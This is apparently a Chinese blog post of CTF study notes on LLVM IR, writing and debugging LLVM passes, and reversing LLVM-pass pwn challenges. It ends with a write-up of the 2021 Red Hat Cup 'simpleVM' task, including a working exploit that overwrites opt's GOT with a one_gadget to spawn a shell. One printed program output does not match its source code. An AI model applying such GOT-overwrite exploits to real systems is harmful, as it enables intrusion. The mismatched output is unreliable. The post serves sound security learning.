[ayoung@blog posts]$ cat ./llvm pass.md

llvm pass

[Last modified: 2024-09-11]

LLVM

LLVM是一个编译器框架。LLVM作为编译器框架,是需要各种功能模块支撑起来的,可以将clang和lld都看做是LLVM的组成部分。下图是Clang/LLVM的简单架构。

LLVM IR

LLVM IR是LLVM的中间表示,文档https://llvm.org/docs/LangRef.html

LLVM中,IR有三种表示

基础语法

全局变量: @global_variable = global i32 0 栈上变量 %local_variable = alloca i32

这两个变量实际上都是ptr指针,指向它们所处的一个i32大小的内存区域 要操作这些值,必须使用load和store这两个命令

load获取值,下面把一个ptr指针@global_variable的i32类型的值赋给虚拟寄存器%1: %1 = load i32, ptr @global_variable

store存储值,下面将i32类型的值1赋给ptr类型的全局变量@global_variable所指的内存区域中: store i32 1, ptr @global_variable

指针类型:ptr

int x, y;
size_t address_of_x = (size_t)&x;
size_t address_of_y = address_of_x - sizeof(int);
int also_y = *(int *)address_of_y;
%x = alloca i32 ; %x is of type ptr, which is the address of variable x
%y = alloca i32 ; %y is of type ptr, which is the address of variable y
%address_of_x = ptrtoint ptr %x to i64
%address_of_y = sub i64 %address_of_x, 4
%also_y = inttoptr i64 %address_of_y to ptr ; %also_y is of type ptr, which is the address of variable y

聚合类型:数组和结构体

C语言中的int[4]如下 %a = alloca [4 x i32]

也可以使用类似语法进行初始化: @global_array = global [4 x i32] [i32 0, i32 1, i32 2, i32 3]

特别地,因为字符串在底层可以看作字符组成的数组,所以LLVM IR为我们提供了语法糖:

@global_string = global [12 x i8] c"Hello world\00"

C中结构体:

struct MyStruct {
    int x;
    char y;
};

对应IR:

%MyStruct = type {
    i32,
    i8
}

初始化一个结构体:

@global_structure = global %MyStruct { i32 1, i8 0 }
; or
@global_structure = global { i32, i8 } { i32 1, i8 0 }

getelementptr:访问以指针形式存储的聚合类型

C:

struct MyStruct {
    int x;
    int y;
};

void foo(struct MyStruct *my_structs_ptr) {
    int my_y = my_structs_ptr[2].y;
}

IR:

%MyStruct = type { i32, i32 }

define void @foo(ptr %my_structs_ptr) {
    %my_y_in_stack = alloca i32
    %my_y_ptr = getelementptr %MyStruct, ptr %my_structs_ptr, i64 2, i32 1
    %my_y_val = load i32, ptr %my_y_ptr
    store i32 %my_y_val, ptr %my_y_in_stack
    ret void
}

核心:getelementptr 4个参数

更多getelementptr机理:https://llvm.org/docs/GetElementPtr.html

LLVM相关工具

opt是一个在IR级别做程序优化的工具,输入和输出都是同一类型的LLVM IR

llvm-link,是IR级别的链接器,链接IR文件

llvm-as是针对LLVM IR的汇编器,功能是将.ll文件翻译为.bc文件。在LLVM项目里,.ll称为LLVM汇编码。

llvm-dis和llvm-as相反,即IR的反汇编器,将.bc文件翻译为.ll文件

clang。通过指定-emit-llvm参数,可以配合-S-c生成.ll.bc文件,就能把Clang的部分和LLVM的后端分离开独立运行

.c -> .ll:clang -emit-llvm -S a.c -o a.ll
.c -> .bc: clang -emit-llvm -c a.c -o a.bc
.ll -> .bc: llvm-as a.ll -o a.bc
.bc -> .ll: llvm-dis a.bc -o a.ll
.bc -> .s: llc a.bc -o a.s

LLVM PASS

然后学习一下LLVM PASS是什么 学习链接: http://www.aosabook.org/en/llvm.html https://zhuanlan.zhihu.com/p/122522485 https://llvm.org/docs/WritingAnLLVMPass.html (官方) https://llvm.org/devmtg/2019-04/slides/Tutorial-Bridgers-LLVM_IR_tutorial.pdf

LLVM Pass框架是LLVM系统的重要组成部分,因为LLVM Passes是编译器中最有意思的部分。Passes执行构成编译器的转换和优化,它们构建这些转换所使用的分析结果,并且它们首先是编译器代码的结构化技术。

所有LLVM passes都是Pass的子类,它们能通过重写继承自Pass的虚拟方法来实现功能。根据你的pass如何工作,你应该继承ModulePass , CallGraphSCCPass, FunctionPass , or LoopPass, 或者RegionPass类,这些类为系统提供了更多关于你的pass做什么的信息,以及它如何与其他pass类相结合。LLVM Pass框架的一个重要特征是它根据你的pass满足的约束(由他们的派生类指示)来调度passes以一个有效的方式运行

Hello world of passes

环境安装,直接使用预编译包

$ sudo apt install llvm
$ sudo apt install clang

可以通过sudo apt install llvm-x.y来指定版本

代码如下 命名空间llvm namespace{开始于一个匿名空间。匿名空间之于c++就像static关键字之于C(在全局作用域)。它让匿名空间内声明的内容仅对当前文件可见。

接下来struct Hello : public FunctionPass {声明了一个Hello类,它是FunctionPass的子类。FunctionPass每次操作一个函数

接着声明LLVM用来标识pass的pass标识符,这允许LLVM避免使用expensive C++ runtime information

static char ID;
Hello() : FunctionPass(ID) {}

声明一个runOnFunction方法,它重写了继承自FunctionPass的抽象虚拟方法。

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    return false;
  }
}; // end of struct Hello
}  // end of anonymous namespace

char Hello::ID = 0;初始化pass ID。LLVM使用ID地址来标识一个通道,所以初始化值并不重要

最后注册Hello类,给他一个命令行参数"hello",并命名为"Hello World Pass"。最后两个参数描述了它的行为,如果一个pass不修改CFG ,那么第三个参数就被设置为true;如果一个pass是一个分析pass,例如dominator tree pass,那么true就会作为第四个参数。

static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);

完整代码,作用就是在runOnFunction中,遍历了IR中的函数,并打印出函数名称

#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/Support/raw_ostream.h"

#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"

using namespace llvm;

namespace {
struct Hello : public FunctionPass {
  static char ID;
  Hello() : FunctionPass(ID) {}

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    return false;
  }
}; // end of struct Hello
}  // end of anonymous namespace

char Hello::ID = 0;
static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);

static RegisterStandardPasses Y(
    PassManagerBuilder::EP_EarlyAsPossible,
    [](const PassManagerBuilder &Builder,
       legacy::PassManagerBase &PM) { PM.add(new Hello()); });

编译

clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`

即可得到一个LLVMHello.so文件

接下来可以使用opt命令通过pass来运行一个LLVM程序,因为使用RegisterPass注册了pass,所以一旦被加载就能使用opt访问它

现在随便写一个程序

#include<stdio.h>
#include<stdlib.h>
int a(){return 0;}
int b(){return 0;}
int c(){return 0;}
int main(){
	printf("1!\n");
	return 0;
}

使用clang编译成.ll文件 clang -emit-llvm -S main.c -o main.ll

; ModuleID = 'main.c'
source_filename = "main.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [4 x i8] c"1!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define i32 @a() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @b() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @c() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @main() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i32 0, i32 0))
  ret i32 0
}

declare i32 @printf(i8*, ...) #1

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}

运行一下,LLVM PASS就会遍历IR并输出每个函数的函数名称

ayoung@ubuntu:~/pwn/llvm/eg$ opt -load ./LLVMHello.so -hello ./main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
Hello: b
Hello: c
Hello: main

魔改Hello world

操作环境ubuntu22.04

// Hello.cpp
#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Constants.h"
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Instructions.h"
#include "llvm/Support/raw_ostream.h"
#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"
using namespace llvm;
 
namespace {
  struct Hello : public FunctionPass {
    static char ID;
    Hello() : FunctionPass(ID) {}
    bool runOnFunction(Function &F) override {
      errs() << "Hello: ";
      errs().write_escaped(F.getName()) << '\n';
      SymbolTableList<BasicBlock>::const_iterator bbEnd = F.end();
      for(SymbolTableList<BasicBlock>::const_iterator bbIter = F.begin(); bbIter != bbEnd; ++bbIter){
         SymbolTableList<Instruction>::const_iterator instIter = bbIter->begin();
         SymbolTableList<Instruction>::const_iterator instEnd  = bbIter->end();
         for(; instIter != instEnd; ++instIter){
            errs() << "OpcodeName = " << instIter->getOpcodeName() << " NumOperands = " << instIter->getNumOperands() << "\n";
            if (instIter->getOpcode() == 56)
            {
                if(const CallInst* call_inst = dyn_cast<CallInst>(instIter)) {
                    errs() << call_inst->getCalledFunction()->getName() << "\n";
                    for (int i = 0; i < instIter->getNumOperands()-1; i++)
                    {
                        if (isa<ConstantInt>(call_inst->getOperand(i)))
                        {
                            errs() << "ConstantInt " << i << " = " << dyn_cast<ConstantInt>(call_inst->getArgOperand(i))->getZExtValue() << "\n";
                        }
                        if (isa<StoreInst>(call_inst->getOperand((i))))
                        {
                            errs() << "StoreInst " << i << " = " << dyn_cast<StoreInst>(call_inst->getArgOperand(i))->getValueOperand() << "\n";
                        }
                    }
                }
            }
            
            
         }
      }
      return false;
    }
  };
}
 
char Hello::ID = 0;
 
// Register for opt
static RegisterPass<Hello> X("Hello", "Hello World Pass");
 
// Register for clang
static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible,
  [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) {
    PM.add(new Hello());
  });

编译(缺头文件 locate或find找文件 补路径)

clang -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -share
d mm.cpp -o LLVMHello.so `llvm-config --ldflags`

运行(使用 llvm pass wmctf2024 里的exp)

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./opt -load ./LLVMHello.so -Hello -enable-new-pm=0 main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
OpcodeName = alloca NumOperands = 1
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_OPEN
OpcodeName = store NumOperands = 2
OpcodeName = call NumOperands = 2
WMCTF_MMAP
ConstantInt 0 = 30864
OpcodeName = call NumOperands = 2
WMCTF_READ
ConstantInt 0 = 26214
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_WRITE
OpcodeName = ret NumOperands = 0
Hello: b
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
a
OpcodeName = ret NumOperands = 0
Hello: c
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
b
OpcodeName = ret NumOperands = 0
Hello: d
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
c
OpcodeName = ret NumOperands = 0
Hello: e
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
d
OpcodeName = ret NumOperands = 0

静态分析

__int64 __fastcall GLOBAL__sub_I_Hello_cpp(llvm::PassRegistry *a1)
{
  __int64 PassRegistry; // rax
  __int64 result; // rax
  _BYTE v3[16]; // [rsp+0h] [rbp-28h] BYREF
  __m128i v4; // [rsp+10h] [rbp-18h]

  X = "Hello World Pass";
  qword_3088 = 16LL;
  qword_3090 = "hello";
  qword_3098 = 5LL;
  qword_30A0 = &`anonymous namespace'::Hello::ID;
  word_30A8 = 0;
  byte_30AA = 0;
  xmmword_30B0 = 0LL;
  qword_30C0 = 0LL;
  qword_30C8 = llvm::callDefaultCtor<`anonymous namespace'::Hello>;
  PassRegistry = llvm::PassRegistry::getPassRegistry(a1);
  llvm::PassRegistry::registerPass(PassRegistry, &X, 0LL);
  __cxa_atexit(llvm::PassInfo::~PassInfo, &X, &_dso_handle);
  v4 = _mm_unpacklo_epi64(
         std::_Function_base::_Base_manager<$_0>::_M_manager,
         std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke);
  result = llvm::PassManagerBuilder::addGlobalExtension(0LL, v3);
  if ( v4.m128i_i64[0] )
    return (v4.m128i_i64[0])(v3, v3, 3LL);
  return result;
}

双击

llvm::callDefaultCtor<`anonymous namespace'::Hello>
__int64 llvm::callDefaultCtor<`anonymous namespace'::Hello>()
{
  __int64 result; // rax

  result = operator new(0x20uLL);
  *(result + 8) = 0LL;
  *(result + 16) = &`anonymous namespace'::Hello::ID;
  *(result + 24) = 3;
  *result = off_2D38;
  return result;
}

再双击最下方的指针off_2D38即可看到虚表位置。其中最下方的指针runOnFunction就是LLVM PASS中重写的runOnFunction方法。

.data.rel.ro:0000000000002D38 off_2D38        dq offset _ZN4llvm4PassD2Ev
.data.rel.ro:0000000000002D38                                         ; DATA XREF: llvm::callDefaultCtor<`anonymous namespace'::Hello>(void)+25↑o
.data.rel.ro:0000000000002D38                                         ; std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke(std::_Any_data const&,llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &)+32↑o
.data.rel.ro:0000000000002D38                                         ; llvm::Pass::~Pass()
.data.rel.ro:0000000000002D40                 dq offset _ZN12_GLOBAL__N_15HelloD0Ev ; `anonymous namespace'::Hello::~Hello()
.data.rel.ro:0000000000002D48                 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(void)
.data.rel.ro:0000000000002D50                 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &)
.data.rel.ro:0000000000002D58                 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &)
.data.rel.ro:0000000000002D60                 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &,llvm::Module const*)
.data.rel.ro:0000000000002D68                 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &,std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>> const&)
.data.rel.ro:0000000000002D70                 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &,llvm::PassManagerType)
.data.rel.ro:0000000000002D78                 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &)
.data.rel.ro:0000000000002D80                 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(void)
.data.rel.ro:0000000000002D88                 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &)
.data.rel.ro:0000000000002D90                 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(void)
.data.rel.ro:0000000000002D98                 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(void const*)
.data.rel.ro:0000000000002DA0                 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(void)
.data.rel.ro:0000000000002DA8                 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(void)
.data.rel.ro:0000000000002DB0                 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(void)
.data.rel.ro:0000000000002DB8                 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint)
.data.rel.ro:0000000000002DC0                 dq offset _ZN12_GLOBAL__N_15Hello13runOnFunctionERN4llvm8FunctionE ; `anonymous namespace'::Hello::runOnFunction(llvm::Function &)
.data.rel.ro:0000000000002DC0 _data_rel_ro    ends

点进来即可看到重写方法的内容

__int64 __fastcall `anonymous namespace'::Hello::runOnFunction(llvm *a1, llvm::Value *a2)
{
  llvm *v2; // rax
  __int64 v3; // rcx
  __int64 v4; // rbx
  __int64 Name; // rax
  __int64 v6; // rdx
  llvm::raw_ostream *v7; // rax
  _BYTE *v8; // rcx

  v2 = llvm::errs(a1);
  v3 = *(v2 + 3);
  if ( (*(v2 + 2) - v3) > 6 )
  {
    *(v3 + 6) = 32;
    *(v3 + 4) = 14959;
    *v3 = 1819043144;
    *(v2 + 3) += 7LL;
  }
  else
  {
    a1 = v2;
    llvm::raw_ostream::write(v2, "Hello: ", 7uLL);
  }
  v4 = llvm::errs(a1);
  Name = llvm::Value::getName(a2);
  v7 = llvm::raw_ostream::write_escaped(v4, Name, v6, 0LL);
  v8 = *(v7 + 3);
  if ( v8 >= *(v7 + 2) )
  {
    llvm::raw_ostream::write(v7, 0xAu);
  }
  else
  {
    *(v7 + 3) = v8 + 1;
    *v8 = 10;
  }
  return 0LL;
}

动态调试

官方文档中也介绍了如何使用gdb进行动态调试

首先在opt进程上启动gdb

gdb opt

opt有很多调试信息,加载需要时间。因为我们还不能在我们的pass中设置断点(共享object直到运行时才加载),所以我们必须执行程序,并让他在调用pass之前、加载共享object之后停下来。最简单的方法是在PassManager::run设置一个断点并配合想要的参数运行程序。下面参数中-hello对应加载的pass文件里注册类时的第一个参数

Reading symbols from opt...(no debugging symbols found)...done.
pwndbg> b PassManager::run
Breakpoint 1 at 0x9be40
pwndbg> set args -load ./LLVMHello.so -hello ./main.ll
pwndbg> show args
Argument list to give program being debugged when it is started is "-load ./LLVMHello.so -hello ./main.ll".
pwndbg> r

一旦opt在PassManager::run方法中停止,就能够自由地在pass中设置断点从而完成调试了

调试脚本debug.sh

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat debug.sh
gdb opt -x "a.gdb"
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat a.gdb 
set args -load ./WMCTF.so -WMCTF -enable-new-pm=0 main.ll
b PassManager::run
r
vmmap WMCTF
#b *(0x7ffff14c6000+0xd3cd)
b *(0x7ffff14c6000+0xD547)
b *0x7ffff14d360e
c

番外 编写输出IR中间语言

u22.04

// HelloGlobalVariable.cpp

#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/GlobalVariable.h"
#include "llvm/IR/IRBuilder.h"
#include "llvm/IR/LLVMContext.h"
#include "llvm/IR/Module.h"
#include "llvm/IR/Verifier.h"

using namespace llvm;

int main(int argc, char* argv[])
{
    LLVMContext context;
    IRBuilder<> builder(context);

    // Create a module
    Module* module = new Module("HelloModule", context);

    // Add a global variable
    module->getOrInsertGlobal("helloGlobalVariable", Type::getInt32Ty(context));
    GlobalVariable* globalVariable = module->getNamedGlobal("helloGlobalVariable");
    globalVariable->setLinkage(GlobalValue::CommonLinkage);
    globalVariable->setAlignment(MaybeAlign(4));

    // Add a function
    Type* voidType = Type::getVoidTy(context);
    FunctionType* functionType = FunctionType::get(voidType, false);
    Function* function = Function::Create(functionType, GlobalValue::ExternalLinkage, "HelloFunction", module);

    // Create a block
    BasicBlock* block = BasicBlock::Create(context, "entry", function);
    builder.SetInsertPoint(block);

    // Print the IR
    verifyFunction(*function);
    module->print(outs(), nullptr);

    return 0;
}

编译

clang++ -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ -w -o HelloGlobalVariable `llvm-config --cxxflags --ldflags --system-libs --libs core` HelloGlobalVariable.cpp 

输出

ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./HelloGlobalVariable 
; ModuleID = 'TriggerModule'
source_filename = "TriggerModule"

@triggerString.addr = private constant [15 x i8] c"Trigger String\00"
@globalTriggerVariable = private global i8* getelementptr inbounds ([15 x i8], [15 x i8]* @triggerString.addr, i32 0, i32 0), align 4

declare void @targetFunction()

define void @HelloFunction() {
entry:
  %loadTrigger = load i8*, i8** @globalTriggerVariable, align 8
  store i8* %loadTrigger, [15 x i8]* @triggerString.addr, align 8
  call void @targetFunction()
  ret void
}

例题

2021红帽杯 simpleVM

先找runOnFunction,一般都是通过重写这个函数来进行一些自定义的操作,由于LLVM PASS编译出的结构都比较相似,可以通过查找最后找到虚表,最下方的就是runOnFunction

可以看到是在遍历函数名称(llvm::Value::getName),如果函数名是o0o0o0o0则进入sub_6AC0进一步操作

__int64 __fastcall sub_6830(__int64 a1, llvm::Value *a2)
{
  __int64 v2; // rdx
  bool v4; // [rsp+7h] [rbp-119h]
  size_t v5; // [rsp+10h] [rbp-110h]
  const void *Name; // [rsp+28h] [rbp-F8h]
  __int64 v7; // [rsp+30h] [rbp-F0h]
  int v8; // [rsp+94h] [rbp-8Ch]

  Name = llvm::Value::getName(a2);
  v7 = v2;
  if ( "o0o0o0o0" )
    v5 = strlen("o0o0o0o0");
  else
    v5 = 0LL;
  v4 = 0;
  if ( v7 == v5 )
  {
    if ( v5 )
      v8 = memcmp(Name, "o0o0o0o0", v5);
    else
      v8 = 0;
    v4 = v8 == 0;
  }
  if ( v4 )
    sub_6AC0(a1, a2);
  return 0LL;
}

这里的llvm::Function::beginllvm::Function::end顾名思义,就是获取一个BasicBlock的开头和结尾,进行遍历操作,遍历IR中的o0o0o0o0函数的BasicBlock基本代码块,然后送进sub_6B80处理进一步处理。

unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2)
{
  llvm::BasicBlock *v3; // [rsp+20h] [rbp-30h]
  __int64 v4; // [rsp+38h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  v5[0] = llvm::Function::begin(a2);
  while ( 1 )
  {
    v4 = llvm::Function::end(a2);
    if ( (llvm::operator!=(v5, &v4) & 1) == 0 )
      break;
    v3 = llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);
    sub_6B80(a1, v3);
    llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++(
      v5,
      0LL);
  }
  return __readfsqword(0x28u);
}

sub_6B80这个函数会遍历基本代码块中的指令,并匹配相应的操作,也就是类似vm能够实现各种指令。

开头是个循环,截取一部分。其中llvm::Instruction::getOpcode返回指令类型,需要是55才会进入后续逻辑。这里指令对应的值定义在/include/llvm/IR/Instruction.def,55对应call

所以这里定义了poppushstoreloadaddmin这几个函数名对应的操作

  v39[1] = __readfsqword(0x28u);
  v39[0] = llvm::BasicBlock::begin(a2);
  while ( 1 )
  {
    v38 = llvm::BasicBlock::end(a2);
    if ( (llvm::operator!=(v39, &v38) & 1) == 0 )
      break;
    v36 = llvm::dyn_cast<llvm::Instruction,llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,false>>(v39);
    if ( llvm::Instruction::getOpcode(v36) == 55 )
    {
      v35 = llvm::dyn_cast<llvm::CallInst,llvm::Instruction>(v36);
      if ( v35 )
      {
        s1 = malloc(0x20uLL);
        CalledFunction = llvm::CallBase::getCalledFunction(v35);
        Name = llvm::Value::getName(CalledFunction);
        *s1 = *Name;
        *(s1 + 1) = Name[1];
        *(s1 + 2) = Name[2];
        *(s1 + 3) = Name[3];
        if ( !strcmp(s1, "pop") )
        ...
        else if ( !strcmp(s1, "push") )
        ...
        else if ( !strcmp(s1, "store") )
        ...
        else if ( !strcmp(s1, "load") )
        ...
        else if ( !strcmp(s1, "add") )
        ...
        else if ( !strcmp(s1, "min") && llvm::CallBase::getNumOperands(v35) == 3 )
        ...
     }
...
HANDLE_OTHER_INST(55, Call   , CallInst   )  // Call a function

其中比较重要的有add llvm::CallBase::getNumOperands,返回funcletpad参数的数量,是返回一条指令中变量的个数,实际上返回的值是函数参数的个数+1 llvm::CallBase::getArgOperand,第二个参数指明取出第几个操作数 llvm::ConstantInt::getZExtValue,get Zero extend value,返回0扩展值

这里reg1_0reg2_0是两个全局变量,可以理解为两个寄存器,当第一个操作数是1时将reg1_0的地址赋给reg,如果第一个操作数是2就把reg2_0的地址赋给reg;然后以reg为地址取值,加等于第二个操作数的值

  else if ( !strcmp(s1, "add") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 3 )
          {
            v17 = llvm::CallBase::getArgOperand(v35, 0);
            reg = 0LL;
            v15 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v17);
            if ( v15 )
            {
              v14 = llvm::ConstantInt::getZExtValue(v15);
              if ( v14 == 1 )
                reg = reg1_0;
              if ( v14 == 2 )
                reg = reg2_0;
            }
            if ( reg )
            {
              v13 = llvm::CallBase::getArgOperand(v35, 1u);
              v12 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13);
              if ( v12 )
                *reg += llvm::ConstantInt::getZExtValue(v12);
            }
          }
        }

load,一个参数,若为1则以reg1_0为地址取值,赋给reg2_0里;如果为2则以reg2_0为地址取值存到reg1_0里。显然这里没有对其值做任何边界检查,存在任意地址读。

else if ( !strcmp(s1, "load") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 2 )
          {
            v21 = llvm::CallBase::getArgOperand(v35, 0);
            v20 = 0LL;
            v19 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v21);
            if ( v19 )
            {
              v18 = llvm::ConstantInt::getZExtValue(v19);
              if ( v18 == 1 )
                v20 = reg1_0;
              if ( v18 == 2 )
                v20 = reg2_0;
            }
            if ( v20 == reg1_0 )
              *reg2_0 = **reg1_0;
            if ( v20 == reg2_0 )
              *reg1_0 = **reg2_0;
          }
        }

store,一个参数,若为1则把reg2_0里的值存到reg1_0存的地址指向的空间,若为2则把reg1_0里的值存到reg2_0存的地址指向的空间。显然存在任意地址写

else if ( !strcmp(s1, "store") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 2 )
          {
            v25 = llvm::CallBase::getArgOperand(v35, 0);
            v24 = 0LL;
            v23 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25);
            if ( v23 )
            {
              v22 = llvm::ConstantInt::getZExtValue(v23);
              if ( v22 == 1 )
                v24 = reg1_0;
              if ( v22 == 2 )
                v24 = reg2_0;
            }
            if ( v24 == reg1_0 )
            {
              **reg1_0 = *reg2_0;
            }
            else if ( v24 == reg2_0 )
            {
              **reg2_0 = *reg1_0;
            }
          }
        }

同时给定的opt-8的got表是可写的,且未开启PIE,所以直接改写opt中got表地址为one gadget即可getshell

pwndbg> checksec
[*] '/home/ayoung/pwn/llvm/opt-8'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

pwndbg> 

exp

具体一点就是先用add将reg1写入got表地址,然后load(1)把函数真实地址加载到reg2上(mov reg2, [reg1]),接着再add一次把函数真实地址加成onegadget,最后用store(1)把reg2存进reg1指向的got表地址(mov [reg1], reg2)。 这里网上的wp都是改写free,我本来想改malloc的发现似乎后来都没调用,索性覆盖一片地址,最后能getshell就行

//clang -emit-llvm -S exp.c -o exp.ll
void store(int a);
void load(int a);
void add(int a, int b);

void o0o0o0o0(){
    add(1, 0x77e120);
    load(1);
    add(2, 0x732dc);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
}
